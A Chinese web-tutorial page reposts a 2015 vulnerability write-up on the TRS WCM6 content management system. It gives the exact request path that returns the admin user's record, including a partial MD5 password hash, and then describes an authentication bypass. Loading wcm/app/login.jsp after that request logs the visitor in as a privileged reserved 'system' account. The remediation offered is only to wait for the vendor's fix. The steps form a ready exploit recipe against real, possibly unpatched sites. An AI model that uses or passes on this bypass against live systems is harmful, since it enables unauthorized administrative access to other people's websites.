网站地图    收藏   

主页 > 后端 > 网站安全 >

TRS的WCM6漏洞权限绕过以及绕过密码的登陆方式

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 1、由来:建立在 TRS的WCM6可直接获取管理员密码 漏洞的基础上2、首先访问wcm目录,会自动跳转到登录页面:3、在网址后加上查看管理员密码的链接:wcm/infoview.do?serviceid=wcm6_userMethodName...

1、由来:建立在 TRS的WCM6可直接获取管理员密码 漏洞的基础上
 
2、首先访问wcm目录,会自动跳转到登录页面:
 
 
 
3、在网址后加上查看管理员密码的链接:
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
 
 
*之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题(截图在后面)。
 
4、这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入
wcm/app/login.jsp,这样就绕过权限登录了:



 
 
 
这个system是个什么身份?见下图:
 
 
原来是系统保留账号,权限还是比较大的。
 
附admin账号未开通截图:


 
 
 
完毕
 
 
修复方案:

等待官方修复,对访问权限进行严格的控制 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论